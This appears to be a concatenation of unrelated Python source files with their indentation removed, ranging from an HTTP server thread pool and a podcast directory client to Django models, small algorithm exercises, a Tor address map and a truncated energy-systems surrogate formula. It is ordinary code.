from six.moves import queue
from jaraco.functools import pass_none
__all__ = ('WorkerThread', 'ThreadPool')
class TrueyZero:
"""Object which equals and does math like the integer 0 but evals True."""
def __add__(self, other):
return other
def __radd__(self, other):
return other
trueyzero = TrueyZero()
_SHUTDOWNREQUEST = None
class WorkerThread(threading.Thread):
"""Thread which continuously polls a Queue for Connection objects.
Due to the timing issues of polling a Queue, a WorkerThread does not
check its own 'ready' flag after it has started. To stop the thread,
it is necessary to stick a _SHUTDOWNREQUEST object onto the Queue
(one for each running WorkerThread).
"""
conn = None
"""The current connection pulled off the Queue, or None."""
server = None
"""The HTTP Server which spawned this thread, and which owns the
Queue and is placing active connections into it."""
ready = False
"""A simple flag for the calling server to know when this thread
has begun polling the Queue."""
def __init__(self, server):
"""Initialize WorkerThread instance.
Args:
server (cheroot.server.HTTPServer): web server object
receiving this request
"""
self.ready = False
self.server = server
self.requests_seen = 0
self.bytes_read = 0
self.bytes_written = 0
self.start_time = None
self.work_time = 0
self.stats = {
'Requests': lambda s: self.requests_seen + (
self.start_time is None
and trueyzero
or self.conn.requests_seen
),
'Bytes Read': lambda s: self.bytes_read + (
self.start_time is None
and trueyzero
or self.conn.rfile.bytes_read
),
'Bytes Written': lambda s: self.bytes_written + (
self.start_time is None
and trueyzero
or self.conn.wfile.bytes_written
),
'Work Time': lambda s: self.work_time + (
self.start_time is None
and trueyzero
or time.time() - self.start_time
),
'Read Throughput': lambda s: s['Bytes Read'](s) / (
s['Work Time'](s) or 1e-6
),
'Write Throughput': lambda s: s['Bytes Written'](s) / (
s['Work Time'](s) or 1e-6
),
}
threading.Thread.__init__(self)
def run(self):
"""Process incoming HTTP connections.
Retrieves incoming connections from thread pool.
"""
self.server.stats['Worker Threads'][self.getName()] = self.stats
try:
self.ready = True
while True:
conn = self.server.requests.get()
if conn is _SHUTDOWNREQUEST:
return
self.conn = conn
is_stats_enabled = self.server.stats['Enabled']
if is_stats_enabled:
self.start_time = time.time()
keep_conn_open = False
try:
keep_conn_open = conn.communicate()
finally:
if keep_conn_open:
self.server.connections.put(conn)
else:
conn.close()
if is_stats_enabled:
self.requests_seen += self.conn.requests_seen
self.bytes_read += self.conn.rfile.bytes_read
self.bytes_written += self.conn.wfile.bytes_written
self.work_time += time.time() - self.start_time
self.start_time = None
self.conn = None
except (KeyboardInterrupt, SystemExit) as ex:
self.server.interrupt = ex
class ThreadPool:
"""A Request Queue for an HTTPServer which pools threads.
ThreadPool objects must provide min, get(), put(obj), start()
and stop(timeout) attributes.
"""
def __init__(
self, server, min=10, max=-1, accepted_queue_size=-1,
accepted_queue_timeout=10,
):
"""Initialize HTTP requests queue instance.
Args:
server (cheroot.server.HTTPServer): web server object
receiving this request
min (int): minimum number of worker threads
max (int): maximum number of worker threads
accepted_queue_size (int): maximum number of active
requests in queue
accepted_queue_timeout (int): timeout for putting request
into queue
"""
self.server = server
self.min = min
self.max = max
self._threads = []
self._queue = queue.Queue(maxsize=accepted_queue_size)
self._queue_put_timeout = accepted_queue_timeout
self.get = self._queue.get
self._pending_shutdowns = collections.deque()
def start(self):
"""Start the pool of threads."""
for i in range(self.min):
self._threads.append(WorkerThread(self.server))
for worker in self._threads:
worker.setName(
'CP Server {worker_name!s}'.
format(worker_name=worker.getName()),
)
worker.start()
for worker in self._threads:
while not worker.ready:
time.sleep(.1)
@property
def idle(self): # noqa: D401; irrelevant for properties
"""Number of worker threads which are idle. Read-only."""
idles = len([t for t in self._threads if t.conn is None])
return max(idles - len(self._pending_shutdowns), 0)
def put(self, obj):
"""Put request into queue.
Args:
obj (:py:class:`~cheroot.server.HTTPConnection`): HTTP connection
waiting to be processed
"""
self._queue.put(obj, block=True, timeout=self._queue_put_timeout)
def _clear_dead_threads(self):
# Remove any dead threads from our list
for t in [t for t in self._threads if not t.is_alive()]:
self._threads.remove(t)
try:
self._pending_shutdowns.popleft()
except IndexError:
pass
def grow(self, amount):
"""Spawn new worker threads (not above self.max)."""
if self.max > 0:
budget = max(self.max - len(self._threads), 0)
else:
# self.max <= 0 indicates no maximum
budget = float('inf')
n_new = min(amount, budget)
workers = [self._spawn_worker() for i in range(n_new)]
while not all(worker.ready for worker in workers):
time.sleep(.1)
self._threads.extend(workers)
def _spawn_worker(self):
worker = WorkerThread(self.server)
worker.setName(
'CP Server {worker_name!s}'.
format(worker_name=worker.getName()),
)
worker.start()
return worker
def shrink(self, amount):
"""Kill off worker threads (not below self.min)."""
# Grow/shrink the pool if necessary.
# Remove any dead threads from our list
amount -= len(self._pending_shutdowns)
self._clear_dead_threads()
if amount <= 0:
return
# calculate the number of threads above the minimum
n_extra = max(len(self._threads) - self.min, 0)
# don't remove more than amount
n_to_remove = min(amount, n_extra)
# put shutdown requests on the queue equal to the number of threads
# to remove. As each request is processed by a worker, that worker
# will terminate and be culled from the list.
for n in range(n_to_remove):
self._pending_shutdowns.append(None)
self._queue.put(_SHUTDOWNREQUEST)
def stop(self, timeout=5):
"""Terminate all worker threads.
Args:
timeout (int): time to wait for threads to stop gracefully
"""
# for compatability, negative timeouts are treated like None
# TODO: treat negative timeouts like already expired timeouts
if timeout is not None and timeout < 0:
timeout = None
warnings.warning(
'In the future, negative timeouts to Server.stop() '
'will be equivalent to a timeout of zero.',
stacklevel=2,
)
if timeout is not None:
endtime = time.time() + timeout
# Must shut down threads here so the code that calls
# this method can know when all threads are stopped.
for worker in self._threads:
self._queue.put(_SHUTDOWNREQUEST)
ignored_errors = (
# TODO: explain this exception.
AssertionError,
# Ignore repeated Ctrl-C. See cherrypy#691.
KeyboardInterrupt,
)
for worker in self._clear_threads():
remaining_time = timeout and endtime - time.time()
try:
worker.join(remaining_time)
if worker.is_alive():
# Timeout exhausted; forcibly shut down the socket.
self._force_close(worker.conn)
worker.join()
except ignored_errors:
pass
@staticmethod
@pass_none
def _force_close(conn):
if conn.rfile.closed:
return
try:
try:
conn.socket.shutdown(socket.SHUT_RD)
except TypeError:
# pyOpenSSL sockets don't take an arg
conn.socket.shutdown()
except OSError:
# shutdown sometimes fails (race with 'closed' check?)
# ref #238
pass
def _clear_threads(self):
"""Clear self._threads and yield all joinable threads."""
# threads = pop_all(self._threads)
threads, self._threads[:] = self._threads[:], []
return (
thread
for thread in threads
if thread is not threading.currentThread()
)
@property
def qsize(self):
"""Return the queue size."""
return self._queue.qsize()
|
from __future__ import unicode_literals
import logging
import requests
import string
import urllib2
import urlparse
from mopidy_podcast.directory import PodcastDirectory
from mopidy_podcast.models import Ref
from . import Extension
_TAG_PATH = '/api/2/tag/{tag}/{count}.json'
_TAGS_PATH = '/api/2/tags/{count}.json'
_SEARCH_PATH = '/search.json'
logger = logging.getLogger(__name__)
class Formatter(string.Formatter):
def get_value(self, key, args, kwargs):
try:
return super(Formatter, self).get_value(key, args, kwargs)
except KeyError:
return None
formatter = Formatter()
class GPodderDirectory(PodcastDirectory):
name = 'gpodder'
def __init__(self, config):
super(GPodderDirectory, self).__init__(config)
self._config = config[Extension.ext_name]
self._session = requests.Session()
base_url = self._config['base_url']
self._tag_url = urlparse.urljoin(base_url, _TAG_PATH)
self._tags_url = urlparse.urljoin(base_url, _TAGS_PATH)
self._search_url = urlparse.urljoin(base_url, _SEARCH_PATH)
self.root_name = self._config['root_name'] # for browsing
def browse(self, uri, limit=None):
if not uri or uri == '/':
return self._tags(self._tags_url, limit)
else:
return self._podcasts(self._tag_url, limit, tag=uri.strip('/'))
def search(self, uri, terms, attr=None, type=None, limit=None):
if uri and uri != '/':
return None # no tag-related searches in gpodder.net
if attr is not None:
return None # no attribute searches in gpodder.net
if type not in (None, Ref.PODCAST):
return None # no searching for episodes in gpodder.net
return self._podcasts(self._search_url, query=terms, limit=limit)
def _tags(self, url, limit=None, **kwargs):
refs = []
count = limit or self._config['count']
format = self._config['tag_format']
for item in self._request(url, limit=limit, count=count, **kwargs):
uri = urllib2.quote(item['tag'].encode('utf-8'))
name = formatter.vformat(format, [], item)
refs.append(Ref.directory(uri=uri, name=name))
return refs
def _podcasts(self, url, limit=None, **kwargs):
refs = []
count = limit or self._config['count']
format = self._config['podcast_format']
for item in self._request(url, limit=limit, count=count, **kwargs):
uri, _ = urlparse.urldefrag(item['url'])
name = formatter.vformat(format, [], item)
refs.append(Ref.podcast(uri=uri, name=name))
return refs
def _request(self, url, query=None, limit=None, **kwargs):
response = self._session.get(
url.format(**kwargs),
params={'q': query},
timeout=self._config['timeout']
)
response.raise_for_status()
logger.debug('Retrieving %s took %s', response.url, response.elapsed)
return response.json()[:limit]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, ConcurrencyContainer, PriorityContainer, Logger
from sonia_flexbe_behaviors.gate_task_sm import gate_taskSM
from sonia_flexbe_behaviors.jiangshi_task_sm import jiangshi_taskSM
from sonia_flexbe_behaviors.path_task_sm import path_taskSM
from sonia_flexbe_behaviors.vision_droppers_sm import vision_droppersSM
from sonia_flexbe_states.set_control_mode import set_control_mode
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
# [/MANUAL_IMPORT]
'''
Created on Wed Nov 17 2021
@author: William FA
'''
class CompetitionrunASM(Behavior):
'''
Gate trickshot task
Path task
Jiangshi task
Path task
Dropper task
'''
def __init__(self):
super(CompetitionrunASM, self).__init__()
self.name = 'Competition run A'
# parameters of this behavior
# references to used behaviors
self.add_behavior(gate_taskSM, 'gate_task')
self.add_behavior(jiangshi_taskSM, 'jiangshi_task')
self.add_behavior(path_taskSM, 'path_task')
self.add_behavior(path_taskSM, 'path_task_2')
self.add_behavior(vision_droppersSM, 'vision_droppers')
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
# [/MANUAL_INIT]
# Behavior comments:
def create(self):
# x:893 y:586, x:41 y:477
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
# [/MANUAL_CREATE]
with _state_machine:
# x:90 y:47
OperatableStateMachine.add('gate_task',
self.use_behavior(gate_taskSM, 'gate_task'),
transitions={'finished': 'path_task', 'failed': 'stop control 2'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:445 y:198
OperatableStateMachine.add('jiangshi_task',
self.use_behavior(jiangshi_taskSM, 'jiangshi_task'),
transitions={'finished': 'path_task_2', 'failed': 'stop control 2'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit})
# x:360 y:63
OperatableStateMachine.add('path_task',
self.use_behavior(path_taskSM, 'path_task'),
transitions={'finished': 'jiangshi_task', 'failed': 'stop control 2', 'lost_target': 'stop control 2'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit, 'lost_target': Autonomy.Inherit})
# x:462 y:328
OperatableStateMachine.add('path_task_2',
self.use_behavior(path_taskSM, 'path_task_2'),
transitions={'finished': 'vision_droppers', 'failed': 'stop control 2', 'lost_target': 'stop control 2'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit, 'lost_target': Autonomy.Inherit})
# x:627 y:571
OperatableStateMachine.add('stop control 1',
set_control_mode(mode=0, timeout=3),
transitions={'continue': 'finished', 'failed': 'finished'},
autonomy={'continue': Autonomy.Off, 'failed': Autonomy.Off})
# x:159 y:325
OperatableStateMachine.add('stop control 2',
set_control_mode(mode=0, timeout=3),
transitions={'continue': 'failed', 'failed': 'failed'},
autonomy={'continue': Autonomy.Off, 'failed': Autonomy.Off})
# x:472 y:455
OperatableStateMachine.add('vision_droppers',
self.use_behavior(vision_droppersSM, 'vision_droppers'),
transitions={'finished': 'stop control 1', 'failed': 'stop control 2', 'lost_target': 'stop control 2'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit, 'lost_target': Autonomy.Inherit})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
|
import luz
import torch
luz.set_seed(123)
def get_dataset(size):
x = torch.rand(10)
y = torch.tensor([0.0, 0.0, 0.0, 1.0, 0.0])
d = luz.Data(x=x, y=y)
return luz.Dataset([d] * size)
class Net(luz.Model):
def __init__(self):
super().__init__()
self.lin = torch.nn.Linear(10, 5)
def forward(self, x):
return self.lin(x)
class Learner(luz.Learner):
def model(self):
return Net()
def criterion(self):
return torch.nn.MSELoss()
def optimizer(self, model):
return torch.optim.Adam(model.parameters())
def hyperparams(self, tuner):
return dict(batch_size=tuner.sample(1, 20))
def fit_params(self):
return dict(
stop_epoch=10,
early_stopping=True,
)
def loader(self, dataset):
return dataset.loader(batch_size=self.hparams.batch_size)
def scorer(self):
return luz.Holdout(0.25, 0.3)
def tuner(self):
return luz.RandomSearch(7)
learner = Learner()
d = get_dataset(1000)
print(learner.tune(d, "cpu"))
|
#!/usr/bin/env python
from __future__ import print_function
import os,sys,argparse,logging,time
import getpass
parser = argparse.ArgumentParser()
parser.add_argument("brokeraddr",type=str,help="Broker Address")
parser.add_argument("-l","--logfile",type=str, default=None,
help="where the log file is writen to")
parser.add_argument("-d","--debug",action="store_true",
help="set logger level to debug")
parser.add_argument("-i","--input",type=str,default=None,
help="input file to run over")
parser.add_argument("-o","--output",type=str,default=None,
help="output file name")
parser.add_argument("-a","--adc",type=str,default="wire",
help="adc producer from input")
parser.add_argument("-n","--out_tree_name",type=str,default="mrcnn",
help="output tree name")
parser.add_argument("-t","--tick",type=bool,default=True,
help="specifies whether tick backwards")
parser.add_argument("--local",action="store_true",default=False,
help="runs a local job with a broker and worker on an inter process socket (ipc)")
parser.add_argument("--weights-dir",type=str,default="None",
help="specify path to directory with weights (assumes weight names)")
if __name__ == "__main__":
args = parser.parse_args(sys.argv[1:])
from UBMRCNNClient import UBMRCNNClient
endpoint = args.brokeraddr
level = logging.DEBUG
if args.debug:
level = logging.DEBUG
if args.logfile is not None:
logging.basicConfig(filename=args.logfile,level=level)
log = logging.getLogger("start_ublarcvsever_worker_main")
logging.basicConfig(level=logging.DEBUG)
workers_v = None
broker = None
if args.local:
from ublarcvserver.start_broker import start_broker
from start_ubmrcnn_worker import startup_ubmrcnn_workers
if len(endpoint)<5 or endpoint[:6]!="ipc://":
raise ValueError("Broker address must be an IPC socker. Addresses look like: 'ipc:///tmp/feeds/mysocketname'. Got: {}".format(endpoint))
# start a broker daemon
broker = start_broker(endpoint)
# weight files
weights_files = {0:args.weights_dir+"/mcc8_mrcnn_plane0.pth",
1:args.weights_dir+"/mcc8_mrcnn_plane1.pth",
2:args.weights_dir+"/mcc8_mrcnn_plane2.pth"}
workers_v = startup_ubmrcnn_workers(endpoint,
weights_files,
nplanes=[0,1,2],
device_id="cpu",
batch_size=1)
client = UBMRCNNClient(args.brokeraddr,args.input,args.output,
adc_producer=args.adc, tick_backwards=args.tick, mrcnn_tree_name=args.out_tree_name)
client.connect()
client.process_entries()
print("processed")
client.finalize()
|
# -*- coding=utf-8 -*-
"""{{cookiecutter.project_name}} core module."""
def get_emojis():
"""Return a dict of emojis."""
return dict(snek="🐍", rabit="🐰", monky="🐒")
|
"""empty message
Revision ID: 444d4749dfa1
Revises: 16f0ba32110a
Create Date: 2021-10-14 06:23:17.102819
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '444d4749dfa1'
down_revision = '16f0ba32110a'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('docker', sa.Column('expand', sa.Text(length=65536), nullable=True))
op.add_column('docker', sa.Column('last_image', sa.String(length=200), nullable=True))
op.add_column('docker', sa.Column('need_gpu', sa.Boolean(), nullable=True))
op.add_column('pipeline', sa.Column('expired_limit', sa.Integer(), nullable=False))
op.add_column('service', sa.Column('expand', sa.Text(length=65536), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('service', 'expand')
op.drop_column('pipeline', 'expired_limit')
op.drop_column('docker', 'need_gpu')
op.drop_column('docker', 'last_image')
op.drop_column('docker', 'expand')
# ### end Alembic commands ###
|
import pytest
from pytest_djangoapp.configuration import Configuration
def test_configration(pytestconfig):
settings = Configuration.get()
settings[Configuration._KEY_APP] = 'some'
assert Configuration.get_combined(pytestconfig)
settings[Configuration._KEY_APP] = ''
assert Configuration.get_combined(pytestconfig)
def swap_dir(level):
old_dir = pytestconfig.invocation_dir
try:
pytestconfig.invocation_dir = old_dir.parts()[level]
assert Configuration.get_combined(pytestconfig)
finally:
pytestconfig.invocation_dir = old_dir
with pytest.raises(Exception):
# Unable to deduce app name.
swap_dir(-4)
def test_settings_hook():
from django.conf import settings
assert settings.HOOKED
|
from pydriller.domain.developer import Developer
def test_eq_dev():
d1 = Developer("Davide", "s.d@gmail.com")
d2 = Developer("Davide", "s.d@gmail.com")
d3 = Developer("Davide", "s.d@gmail.eu")
d4 = None
assert d1 == d1
assert d1 == d2
assert d1 != d3
assert d1 != d4 |
from django.contrib import admin
from requestHandler.models import User, Song, SystemSetting
admin.site.register(User)
admin.site.register(Song)
admin.site.register(SystemSetting)
|
import redis
from settings import REDIS_URL
from rq import Worker, Queue, Connection
listen = ['default']
conn = redis.from_url(REDIS_URL)
if __name__ == '__main__':
with Connection(conn):
worker = Worker(list(map(Queue, listen)))
worker.work() |
from uio import * |
"""
This problem was asked by Amazon.
Given a pivot x, and a list lst, partition the list into three parts.
The first part contains all elements in lst that are less than x
The second part contains all elements in lst that are equal to x
The third part contains all elements in lst that are larger than x
Ordering within a part can be arbitrary.
For example, given x = 10 and lst = [9, 12, 3, 5, 14, 10, 10], one partition may be [9, 3, 5, 10, 10, 12, 14].
"""
def order_into_three(arr, pivot):
res = [] # new resultant arr
lesser_idx, greater_idx = 0, 0 # indices to the front of the part where elements are less than pivot and greater than, respectively
for num in arr:
if num < pivot: # num less than pivot
res.insert(lesser_idx, num)
lesser_idx += 1
greater_idx += 1
elif num > pivot: # num greater than pivot
res.insert(greater_idx, num)
greater_idx += 1
else: # num equal to pivot
res.insert(lesser_idx, num)
greater_idx += 1
return res
if __name__ == '__main__':
print(order_into_three([9, 12, 3, 5, 14, 10, 10], 10))
|
def get_hour(epoch_seconds):
return epoch_seconds // 3600
def get_minutes(epoch_seconds):
return (epoch_seconds // 60) % 60
def get_seconds(epoch_seconds):
return epoch_seconds % 60
def time_from_utc(utc_offset, utc_zero):
return utc_offset + utc_zero
def get_time(hour, minutes, seconds, time_type, meridiem='AM'):
if minutes < 0 or minutes > 59:
return 'Invalid minutes(range 0-59)'
if seconds < 0 or seconds > 59:
return 'Invalid seconds(range 0-59)'
if time_type == 24:
if hour < 0 or hour > 23:
return 'Invalid hours(range 0-23)'
elif time_type == 12:
if hour < 0 or hour > 12:
return 'Invalid hours(range 1-12)'
else:
return 'Invalid time_type(12 or 24 only)'
if hour < 10:
hour = "0" + str(hour)
if minutes < 10:
minutes = "0" + str(minutes)
if seconds < 10:
seconds = "0" + str(seconds)
time = str(hour) + ":" + str(minutes) + ":" + str(seconds)
if time_type == 12:
time = time + " " + meridiem
return time
|
import os
from typing import List
import numpy as np
import pandas as pd
from pandas.core.groupby import DataFrameGroupBy
from ..indicators import AbstractIndicator
from ..domain import StockPrice, Portfolio
from ..converters import utils
class StockFrame():
def __init__(self, **kwargs) -> None:
self.df: pd.DataFrame = None
self.cache_path = None
if 'cache_path' in kwargs:
self.cache_path = kwargs['cache_path']
if os.path.exists(self.cache_path):
## use cache if available
converters = {
'open': utils.decimal_from_value,
'close': utils.decimal_from_value,
'high': utils.decimal_from_value,
'low': utils.decimal_from_value,
}
self.df: pd.DataFrame = pd.read_csv(self.cache_path, converters=converters)
self.df.datetime = pd.to_datetime(self.df.datetime)
self.df.volume = self.df.volume.astype(int)
self.df = self.df.set_index(keys=StockPrice.index_columns())
if self.df is None:
if 'prices' in kwargs.keys():
self.df = pd.DataFrame(data=[ price.to_obj() for price in kwargs['prices'] ]).set_index(keys=StockPrice.index_columns())
self.indicators: List[AbstractIndicator] = kwargs['indicators']
self.symbols = np.unique(
list(map(lambda index: index[0], self.df.index))
)
self._refresh_indicators()
@property
def symbol_groups(self) -> DataFrameGroupBy:
return self.df.groupby(by='symbol', as_index=False, sort=True)
def add_rows(self, prices: List[StockPrice], active_portfolio: Portfolio, **kwargs) -> None:
columns = StockPrice.feature_columns()
for price in prices:
self.df.loc[price.index, columns] = price.to_list()
self._refresh_indicators(active_portfolio=active_portfolio, **kwargs)
def _refresh_indicators(self, **kwargs) -> None:
self.df.sort_index(inplace=True)
for indicator in self.indicators:
calc = []
for symbol in self.symbols:
df_updated = indicator.compute(
self.df.loc[symbol].copy(),
**kwargs
).reset_index()
df_updated['symbol'] = symbol
calc.append(df_updated)
## recreate df,
self.df = pd.concat(calc).set_index(keys=StockPrice.index_columns()).sort_index()
self._cache()
def _cache(self):
if self.cache_path is None:
return
self.df.to_csv(self.cache_path)
|
from django.conf import settings
from django.contrib.postgres.fields import JSONField
from django.db import models
from mptt.fields import TreeForeignKey
from mptt.models import MPTTModel
from publications.models import Platform
class Organization(MPTTModel):
ext_id = models.PositiveIntegerField(
unique=True, help_text='object ID taken from EMRS', null=True, default=None
)
parent = TreeForeignKey(
'self', on_delete=models.CASCADE, null=True, blank=True, related_name='children'
)
ico = models.PositiveIntegerField(
help_text='Business registration number', null=True, blank=True
)
internal_id = models.CharField(
max_length=50, unique=True, null=True, help_text='special ID used for internal purposes'
)
name = models.CharField(max_length=250)
short_name = models.CharField(max_length=100)
url = models.URLField(blank=True)
fte = models.PositiveIntegerField(
help_text='Last available FTE number for organization', default=0
)
address = JSONField(default=dict)
source = models.ForeignKey(
'core.DataSource',
on_delete=models.CASCADE,
null=True,
blank=True,
related_name='defined_organizations',
)
users = models.ManyToManyField(
settings.AUTH_USER_MODEL, through='UserOrganization', related_name='organizations'
)
platforms = models.ManyToManyField('publications.Platform', through='logs.OrganizationPlatform')
created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
class Meta:
ordering = ('name',)
unique_together = (('ico', 'level'),) # duplicated ico can only be between parent and child
def __str__(self):
return self.name
class UserOrganization(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)
organization = models.ForeignKey(Organization, on_delete=models.CASCADE)
is_admin = models.BooleanField(default=False)
source = models.ForeignKey('core.DataSource', on_delete=models.CASCADE, null=True, blank=True)
created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
def __str__(self):
return f'{self.organization} / {self.user}'
|
# Dylan Connors
import re
def get_planet_names(content:str) -> str:
pattern = re.compile("\"BodyName\":\"(.+?)\"")
result = pattern.findall(content)
names = []
if result:
for r in result:
names.append(r)
return names
|
#!/usr/bin/env python3
# This script is used to run the cluster pool reservation system
import sys
import traceback
from clusterpool.main import main
if __name__ == '__main__':
sys.exit(main())
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import with_statement
from txtorcon.interface import IAddrListener
from txtorcon.util import maybe_ip_addr
from twisted.internet.interfaces import IReactorTime
from twisted.internet import reactor
import datetime
import shlex
class Addr(object):
"""
One address mapping (e.g. example.com -> 127.0.0.1)
"""
def __init__(self, map):
"""
map is an AddrMap instance, used for scheduling expiries and
updating the map.
"""
self.map = map
self.ip = None
self.name = None
self.expiry = None
self.expires = None
self.created = None
def update(self, *args):
"""
deals with an update from Tor; see parsing logic in torcontroller
"""
gmtexpires = None
(name, ip, expires) = args[:3]
for arg in args:
if arg.lower().startswith('expires='):
gmtexpires = arg[8:]
if gmtexpires is None:
if len(args) == 3:
gmtexpires = expires
else:
if args[2] == 'NEVER':
gmtexpires = args[2]
else:
gmtexpires = args[3]
self.name = name # "www.example.com"
self.ip = maybe_ip_addr(ip) # IPV4Address instance, or string
if self.ip == '<error>':
self._expire()
return
fmt = "%Y-%m-%d %H:%M:%S"
# if we already have expiry times, etc then we want to
# properly delay our timeout
oldexpires = self.expires
if gmtexpires.upper() == 'NEVER':
# FIXME can I just select a date 100 years in the future instead?
self.expires = None
else:
self.expires = datetime.datetime.strptime(gmtexpires, fmt)
self.created = datetime.datetime.utcnow()
if self.expires is not None:
if oldexpires is None:
if self.expires <= self.created:
diff = datetime.timedelta(seconds=0)
else:
diff = self.expires - self.created
self.expiry = self.map.scheduler.callLater(diff.seconds,
self._expire)
else:
diff = self.expires - oldexpires
self.expiry.delay(diff.seconds)
def _expire(self):
"""
callback done via callLater
"""
del self.map.addr[self.name]
self.map.notify("addrmap_expired", *[self.name], **{})
class AddrMap(object):
"""
A collection of Addr objects mapping domains to addresses, with
automatic expiry.
FIXME: need listener interface, so far:
addrmap_added(Addr)
addrmap_expired(name)
"""
def __init__(self):
self.addr = {}
self.scheduler = IReactorTime(reactor)
self.listeners = []
def update(self, update):
"""
Deal with an update from Tor; either creates a new Addr object
or find existing one and calls update() on it.
"""
params = shlex.split(update)
if params[0] in self.addr:
self.addr[params[0]].update(*params)
else:
a = Addr(self)
# add both name and IP address
self.addr[params[0]] = a
self.addr[params[1]] = a
a.update(*params)
self.notify("addrmap_added", *[a], **{})
def find(self, name_or_ip):
"FIXME should make this class a dict-like (or subclass?)"
return self.addr[name_or_ip]
def notify(self, method, *args, **kwargs):
for listener in self.listeners:
getattr(listener, method)(*args, **kwargs)
def add_listener(self, listener):
if listener not in self.listeners:
self.listeners.append(IAddrListener(listener))
|
import os
import requests
from astropy.io import fits
import h5py
from catkit.hardware.FourDTechnology.Accufiz import Accufiz
from catkit.interfaces.Instrument import SimInstrument
class PoppyAccufizEmulator:
def __init__(self, optics, *args, status_code=200, **kwargs):
super().__init__(*args, **kwargs)
self.data = None
self.optics = optics
self.status_code = status_code,
def get(self, url, params=None, **kwargs):
resp = requests.Response()
resp.text = "success"
resp.status_code = self.status_code
return resp
def post(self, url, data=None, json=None, **kwargs):
raise NotImplementedError("TODO: See CATKIT-66.")
command = os.path.basename(url)
if command == "AverageMeasure":
pass
#self.data = optics.do_stuff()
elif command == "SaveMeasurement":
filepath = data["fileName"]
if self.data is None:
raise RuntimeError(f"No data taken to save.")
#h5py.write(self.data, f"{filepath}.h5")
else:
raise NotImplementedError(f"The command '{command}' is not implemented.")
class Accufiz(Accufiz, SimInstrument):
instrument_lib = PoppyAccufizEmulator
|
# -*- coding: utf-8 -*-
#############
#
# Copyright - Nirlendu Saha
#
# author - nirlendu@gmail.com
#
#############
def array_compaction(arr):
"""
Returns a list with unique elements in it
"""
compact_array = []
# Index always points to the last element of the compact_array. Since compact_array is [] initially, index in None
index = None
for i in arr:
# Initialzing the compact_array and index
if compact_array == []:
compact_array.append(i)
index = 0
continue
# Last element of the compact_array has the current element, so the current element is repeated. Skip
elif compact_array[index] == i:
continue
else:
# Last element of the compact_array doesn't has the current element, so the current element is appended.
compact_array.append(i)
index += 1
return compact_array |
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
data_dic = {
1: "(74904.4 * b.wall_temperature_waterwall[t, 1] \
+11301.8 * b.wall_temperature_waterwall[t, 2] \
+2427.54 * b.wall_temperature_waterwall[t, 3] \
+2891.35 * b.wall_temperature_waterwall[t, 4] \
-28320.8 * b.wall_temperature_waterwall[t, 5] \
+171.944 * b.wall_temperature_waterwall[t, 6] \
+14462.9 * b.wall_temperature_waterwall[t, 7] \
+677.973 * b.wall_temperature_waterwall[t, 8] \
-122.598 * b.wall_temperature_waterwall[t, 9] \
-300.609 * b.wall_temperature_waterwall[t, 12] \
+1770.05 * b.wall_temperature_platen[t] \
-169.562 * b.wall_temperature_roof[t] \
+1.92447e+06 * b.flowrate_coal_raw[t] \
+8.65298e+07 * b.mf_H2O_coal_raw[t] \
+1.46803e+09 * b.SR[t] \
-1.68637e+08 * b.SR_lf[t] \
-6385.5 * b.secondary_air_inlet.temperature[t] \
+952262 * b.ratio_PA2coal[t] \
-2.10696e+07 * log(b.wall_temperature_waterwall[t, 1]) \
-5.56721e+06 * log(b.wall_temperature_waterwall[t, 2]) \
-1.21448e+06 * log(b.wall_temperature_waterwall[t, 3]) \
-3.48806e+06 * log(b.wall_temperature_waterwall[t, 4]) \
+1.02069e+07 * log(b.wall_temperature_waterwall[t, 5]) \
-5.47775e+06 * log(b.wall_temperature_waterwall[t, 7]) \
-279177 * log(b.wall_temperature_waterwall[t, 8]) \
+111061 * log(b.wall_temperature_waterwall[t, 9]) \
-646506 * log(b.wall_temperature_platen[t]) \
+3.96004e+06 * log(b.flowrate_coal_raw[t]) \
+45092.6 * log(b.mf_H2O_coal_raw[t]) \
-3.9193e+08 * log(b.SR[t]) \
+1.61406e+08 * log(b.SR_lf[t]) \
-3.84139e+06 * log(b.secondary_air_inlet.temperature[t]) \
+556876 * log(b.ratio_PA2coal[t]) \
-9.88017e+07 * exp(b.mf_H2O_coal_raw[t]) \
-2.86022e+08 * exp(b.SR[t]) \
-35.7424 * b.wall_temperature_waterwall[t, 1]**2 \
+10.3165 * b.wall_temperature_waterwall[t, 5]**2 \
-4.85009 * b.wall_temperature_waterwall[t, 7]**2 \
-21190.8 * b.flowrate_coal_raw[t]**2 \
-5.00302e+08 * b.SR[t]**2 \
+179.062 * b.flowrate_coal_raw[t]**3 \
+2.33815e+08 * b.SR[t]**3 \
